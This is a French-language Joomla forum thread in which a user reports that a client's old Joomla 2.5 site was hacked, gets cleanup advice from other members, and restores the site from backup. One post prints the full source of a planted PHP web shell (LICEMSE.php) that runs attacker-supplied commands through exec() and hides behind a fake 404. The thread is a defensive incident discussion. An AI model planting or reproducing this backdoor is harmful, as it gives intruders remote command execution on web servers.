Site piraté, liens ne marchent plus

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Site piraté, liens ne marchent plus

    Bonjour à tous,

    Bon, mon site joomla est piraté

    Les liens de mon menu principal ne marchent plus. J'ai une simple erreur ''File not found'' avec aucun code html.

    Les liens de mon menu principal sont scencés afficher des les articles d'une catégorie sous forme de blog.

    Donc en fait le lien

    monsite.com/index.php?option=com_content&view=category&layout= blog&id=8

    ne marche pas !

    J'ai aucune idée ou commencer le diagnostic !!!

    Please help !
    Passionné de Joomla!

  • #2
    Re : Site piraté, liens ne marchent plus

    Bonjour

    Tu dis que ton site a été piraté; tu te basses sur quoi pour écrire cela ? Juste cette histoire de lien ?

    Pourrais-tu poster le lien vers ton site svp ?

    Et tente de désactiver le mode de réécriture de Joomla afin de vérifier que ce n'est pas bêtement ça.

    bonne nuit.
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

    Commentaire


    • #3
      Re : Site piraté, liens ne marchent plus

      Bonjour,

      Envoyé par fder Voir le message
      mon site joomla est piraté
      S'il s'agit de www.archivr-photographe.com , il semble bien en effet qu'il soit victime d'un piratage, en l'occurrence de type SEO: https://sitecheck.sucuri.net/results...hotographe.com :-\
      Créateur de sites internet — Agence web indépendante http://www.e-33.fr | http://www.quali-site.fr (région de Bordeaux)

      Commentaire


      • #4
        Re : Site piraté, liens ne marchent plus

        Oui j'ai pas précisé plein de trucs. Pardon.

        J'utilise joomla 2.5. J'ai vraiment honte de ça mais je comptais refaire le site avec la dernière version de joomla. C'est le site de mon client en plus et pas mon site pour dire la vérité. Je vais me faire tuer

        J'ai essayé de désactiver le mode de réécriture de joomla mais c'est pas mieux.

        Je dis que j'étais piraté car j'ai trouvé des fichiers bizarres sur la racine du site avec un contenu effrayant.

        Le plus effrayant s'appelle LICEMSE.php avec le contenu suivant :

        <?php

        $server = $_SERVER['HTTP_HOST'];



        if(isset($_POST['req']))

        {

        $command = $_POST['req'];

        }

        else

        {

        header('HTTP/1.0 404 Not Found');

        exit;

        }



        exec($command, $output);



        foreach($output as $var)

        {

        echo substr_replace($var, $server, 0, 1)."---end---";

        }

        ?>

        J'ai aucune idée comment le pirate a pu uploader un tel fichier sur mon serveur.

        En fait j'ai enlevé les fichiers intrus de la racine du site mais sûrement il y en a d'autres.

        Je pense que j'ai un exit quelques part.

        Voici l'url du site : http://archivr-photographe.com/

        J'ai lancé la commande suivante sur la racine du serveur

        grep -ri 'File not found.' *

        La commande prend beacoup de temps à s'exécuter bien sûr vu le nombre de fichiers qu'il y a.

        Je vous dirai.

        J'ai retauré mon espace FTP par la sauvegarde la plus ancienne chez OVH, soit 2 semaines. C'était déjà infecté

        Je sais pas s'il y a un espoir !!!
        Passionné de Joomla!

        Commentaire


        • #5
          Re : Site piraté, liens ne marchent plus

          Qu'est ce qu'il faut faire ? Comment ils vont m'enlever le contenu malveillant ?
          Passionné de Joomla!

          Commentaire


          • #6
            Re : Site piraté, liens ne marchent plus

            Bonjour,

            Ce qu'il faut faire ? Commencer par lire http://www.aesecure.com/fr/blog/site...ttoyer-le-site

            Ensuite lire encore : http://www.aesecure.com/fr/blog/aese...uick-scan.html

            et si besoin demander à quelqu'un de compétent de faire le nécessaire (Cavo789 ci-dessus est tout indiqué), ça te coûtera sans doute (surement) moins cher que de perdre ton client ....
            Il y a 10 sortes de gens. Ceux qui savent compter en binaire et ceux qui ne savent pas ...

            Commentaire


            • #7
              Re : Site piraté, liens ne marchent plus

              Bonjour

              Ton fichier LICEMSE.php est un virus, là, pas de doute à avoir.

              Pour ta version de Joomla, pas de honte à avoir ! Oui, si tu es en 2.5.2 mais pas si tu es en 2.5.28; pense juste à prévoir du temps à migrer (prévoir et faire).

              Pour la partie nettoyage, je passe après PieceOfCake qui t'a filé les deux liens que j'aurais pu te communiquer : apprendre à nettoyer soi-même et scanner (partiellement) ton site avec aeSecure QuickScan mais, vu ton licemse.php, vraiment aucun de doute à avoir; tu es bon pour nettoyer ton site.

              Bonne journée.
              Christophe (cavo789)
              Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
              Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

              Commentaire


              • #8
                Re : Site piraté, liens ne marchent plus

                Bon ça y est, j'ai sauvé le site.

                J'ai restauré le site. Il est maintenant sain. Je n'ai perdu aucune donnée. J'ai restauré une archive saine puis j'ai restauré un backup de la base de données dans lequel il y a toutes les modifications récentes du client. Je me suis arrangé pour restaurer manuellement ces images et ces fichiers récents. Mais c'était pas trop lourd car je sais ce que mon client fait sur son site.

                Pour partager mon expérience, je dirai que c'est important de faire des back-up de votre site régulièrement. Akeeba m'a été d'une grande utilité. Et il faut garder un oeil sur son site pour voir que tout se passe bien, genre une fois par semaine par exemple. Et puis surtout il faut mettre à jour joomla !! C'est hyper important.

                Je suis ravi que j'ai coupé l'herbe sous les pieds du pirate. Mais ce qu'il m'intrigue maintenant c'est comment peut on uploader des fichiers php sur le site de quelqu'un ?? C'est le comble ! On peut pas faire plus grave que ça ! Il aurait pu lire le fichier de configuration et volé toutes les informations sensibles. Est ce que c'est fait par FTP ? ça m'étonnerai ! Comment ??

                Si quelqu'un a déjà eu ce même cas, je suis curieux de savoir.


                Merci
                Passionné de Joomla!

                Commentaire


                • #9
                  Re : Site piraté, liens ne marchent plus

                  si si on peut faire encore pire crois moi......
                  une fois qu il y a une porte ouverte, meme les elephants peuvent rentrer dans ton magasin de porcelaine

                  La vu les symptomes....tu as de la chance...

                  tu as changé touts tes id ?

                  Commentaire


                  • #10
                    Re : Site piraté, liens ne marchent plus

                    Lefabdu51 a raison
                    as tu changé TOUS tes accès ... ftp ... BDD ... Admin Joomla
                    parce que si le pirate a conservé une copie de ton fichier de config ... il peut rouvrir une énorme porte d'entrée
                    Et le MINIMUM en terme de secu ... c'est de proteger ton dossier administrator .... mais le MIEUX, c'est un firewall genre Aesecure ... et vite !!!
                    Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
                    Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

                    Commentaire

                    Annonce

                    Réduire
                    Aucune annonce pour le moment.

                    Partenaire de l'association

                    Réduire

                    Hébergeur Web PlanetHoster
                    Travaille ...
                    X